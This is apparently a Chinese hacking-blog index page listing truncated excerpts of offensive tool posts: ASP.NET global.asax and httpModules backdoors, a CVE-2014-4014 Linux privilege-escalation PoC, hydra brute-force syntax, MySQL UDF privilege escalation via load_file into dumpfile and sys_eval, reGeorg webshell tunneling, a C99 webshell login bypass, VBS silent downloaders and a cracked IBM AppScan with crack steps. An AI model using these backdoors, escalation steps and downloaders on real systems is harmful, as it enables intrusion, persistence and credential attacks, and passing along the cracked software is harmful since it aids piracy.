记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ASP.NET global.asax、httpHandlers、httpModules 后门

特别注意:需要特别小心配置任何一个误操作都可能导致网站彻底崩溃,对于新手操作危险系数很高。这里只是技术分享,请最好先在本地测试。如有发现BUG与我联系 一:global.asax <%@ Application Language="C#" %> <script RunAt='server'> void Application_Start(object sender, EventArgs e) { //在应用程序启动时运行的代码 } void Application_End(object sender, EventArgs e) { //在应用程
发布时间:2015-06-16 03:30 | 阅读:143771 | 评论:0 | 标签:Tools 后门

sqlplus.jar命令行下连接Mysql、SQLServer、Oracle小工具

使用了一个btc-ascii-table小工具,可以像mysql客户端一样方便的管理数据库。自带mysql、sqlserver2000、2005+、oracle数据库驱动,可以在命令行下直连这几种数据库。连接的时候需要自行指定对应的数据库的驱动URL哦,百度下jdbc或者参考我以前的文章。 交互shell方式: 直接执行命令方式: java -jar sqlplus.jar "com.mysql.jdbc.Driver" "jdbc:mysql://localhost:3306/mysql" "root" "c123456" "select version()" import java.io.Buffer
发布时间:2015-05-30 10:05 | 阅读:142390 | 评论:0 | 标签:Tools

[Zone-lijiejie]GitHack — 一个git泄露利用脚本

原文:http://zone.wooyun.org/content/20082 当前大量开发人员使用git进行版本控制,对站点自动部署。  如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还原重建工程源代码。 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 脚本的工作原理 1. 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 2. 去.git/objects/ 文件夹下下载对应的文件 3. 使用zlib解压文件,按原始的目录结构写入源代码 它的优点 1. 速度快,默认20个工作线程 2. 尽量还原所有的源代码,缺失一部分文件
发布时间:2015-04-29 19:45 | 阅读:152955 | 评论:0 | 标签:Tools

CVE-2014-4014 Local Privilege Escalation

披露日期:[2014.6] 影响版本: Linux kernel 2.6.x、3.4.x、3.10.x、3.12.x、3.14.x /** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include #include #include #include
发布时间:2015-03-25 01:45 | 阅读:122146 | 评论:0 | 标签:linux security tools

强力密码暴力破解工具:hydra

语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] 支持服务: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc
发布时间:2015-03-13 03:25 | 阅读:195580 | 评论:0 | 标签:linux security tools 暴力破解

IBM appscan 9.0破解版

简介: IBM AppScan该产品是一个领先的 Web 应用安全测试工具,曾以 Watchfire AppScan 的名称享誉业界。Rational AppScan 可自动化 Web 应用的安全漏洞评估工作,能扫描和检测所有常见的 Web 应用安全漏洞,例如 SQL 注入(SQL-injection)、跨站点脚本攻击(cross-site scripting)、缓冲区溢出(buffer overflow)及最新的 Flash/Flex 应用及 Web 2.0 应用曝露等方面安全漏洞的扫描。 下载地址: http://yun.baidu.com/s/1eQ1lZB8 破解方法: 安装完成后,将LicenseProvider.dll 替换“....IBMAppScan Standard”目录下同名文件,许可证处
发布时间:2015-02-04 01:55 | 阅读:303105 | 评论:0 | 标签:security tools

axis2 利用小工具cat.aar

Axis2: Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构)。 昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接。看起来别人可以修改response类型,但是我没成功。利用之前发的Cat小工具打包成aar就可以玩了。 axis2管理登陆默认配置了用户名为admin,密码axis2:     axis2管理后台:   想要deploy 自己的应用需要先打成对应的aar、jar包。用eclipse安装axis2插件。 Service Archive Wizard – Eclipse Plug-in 、Code Generator Wizard – Ecl
发布时间:2014-11-12 20:10 | 阅读:346188 | 评论:0 | 标签:Tools

[zone]利用webshell搭建socks代理

FROM:http://zone.wooyun.org/content/14470 老外的开源应用 https://github.com/sensepost/reGeorg 使用示例: python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jspStep 1. 上传一个脚本(aspx|ashx|jsp|php) 到web服务器上。 Step 2. 执行reGeorgSocksProxy.py脚本,连接shell监听端口。 ** 如果你使用nmap等工具需要用到 proxychains。 Step 3. Hack the planet 
发布时间:2014-08-15 18:55 | 阅读:154753 | 评论:0 | 标签:Tools

SqlMap mysql udf.dll 提权

以前分享在百度网盘,好像没人看。直接发文字说明不贴图了哦。 sqlmap lib_mysqludf_sys.zip  上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll 导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径): select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’ (高版本需要导入上面查询到的插件目录) 创建function: create function sys_eval re
发布时间:2014-08-15 18:55 | 阅读:137906 | 评论:0 | 标签:Tools 提权

vbs下载并静默安装jre

安装完成后可以回调,替换echo 123456789和pause就行了。 dim path set ws = CreateObject("WScript.Shell") set fso=createobject("scripting.filesystemobject") ''定义安装路径 path = ws.ExpandEnvironmentStrings("%windir%")+"jre6" ''创建目录 If (fso.FolderExists(path)) Then Else fso.createfolder(path) End If ''文件
发布时间:2014-07-23 21:50 | 阅读:176208 | 评论:0 | 标签:Tools

[zone]C99.PHP webshell 绕过登陆密码漏洞

from:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ 、http://zone.wooyun.org/content/13257C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。  http://127.0.0.1/c99.php?c99shcook[login]=0 可直接登陆。  @extract($_REQUEST["c99shcook"]); 变量覆盖  if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER[&qu
发布时间:2014-06-26 00:20 | 阅读:138026 | 评论:0 | 标签:Tools 漏洞

vbs文件下载小脚本

linux很方便可以直接wget,windows用vbs下载挺方便的。随便在网上找了个小脚本改了下就ok了。 命令行下执行参数url:cscript 1.vbs /url:http://www.baidu.com/img/bdlogo.gif '执行后下载到当前目录:cscript 1.vbs /url:http://www.baidu.com/img/bdlogo.gif Set xPost = CreateObject("Microsoft.XMLHTTP") Set sGet = CreateObject("ADODB.Stream") Sub DownloadToFile(url, file) xPost.Open "GET&quo
发布时间:2014-06-16 03:50 | 阅读:77955 | 评论:1 | 标签:Tools

精选安全插件集:火狐、水狐浏览器通用,适合从事安全的朋友

一般从事于安全的朋友或多或少都使用过火狐浏览器(64位的会使用水狐),而最引人的便是其大量的插件。关于这个收集集:这是一个专门为安全工作者收集的归档,内含大量的安全性方向的工具与附属插件,希望大家会喜欢!The special collection for the security workers filing, contains a lot of the direction of the security tools and auxiliary plug-in, we hope you like it!对于一个从事安全的朋友而言,火狐所拥有的安全方面的插件是非常地便捷的,下面罗列了一些:1、Adblock Plus 作者:Wladimir Palant被广告弄得搓火吗?被跟随鼠标的标语弄得烦心吗?被横幅弄得感
发布时间:2014-04-14 17:20 | 阅读:203018 | 评论:0 | 标签:Tools

Ubuntu 装机常用软件 不定期更新

1、Python # 默认自带了,装一个easy_install插件。 2、Wing Ide # Python的一个很方便的开发工具,收费软件,不过有破解版的。Ubuntu 12.04下破解安装Python开发工具WingIDE4.1 3、Kodos # 方便调试正则的的利器,软件中心就有安装,或者sudo apt-get install Kodos。 4、NetBeans Ide # 免费的PHP调试工具,很方便,最好配合Xdebug使用。 5、SQLite database browser # 一款SQLite数据库浏览器。 6、Chromium # 谷歌浏览器,不解释了。 7、FireFox # 火狐浏览器,必备插件有:《Hackbar》、《Firebug》、《Linve Http Headers》、《R
发布时间:2013-03-30 16:35 | 阅读:149948 | 评论:0 | 标签:Linux tools ubuntu

Fiddler2抓包工具

一款免费且功能强大的数据包抓取软件。它通过代理的方式获取程序http通讯的数据,可以用其检测网页和服务器的交互情况,能够记录所有客户端和服务器间 的http请求,支持监视、设置断点、甚至修改输入输出数据等功能。fiddler包含了一个强大的基于事件脚本的子系统,并且能够使用.net框架语言 扩展。所以无论对开发人员或者测试人员来说,都是非常有用的工具。   抓包工具 使用方法:(需安装.net环境)下载完成后,解压文件,然后点击“Fiddler.exe”文件即可启动软件。 一:Fiddler实用功能使用说明: 1、fiddler捕获浏览器的会话: 能支持http代理的任意程序都能被Fiddler捕获到,由于Fiddler的运行机制就是监听本机上的8888端口的http代理,所以我们要将浏览 器的IE代
发布时间:2013-01-21 16:38 | 阅读:209349 | 评论:0 | 标签:Tools 抓包工具

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云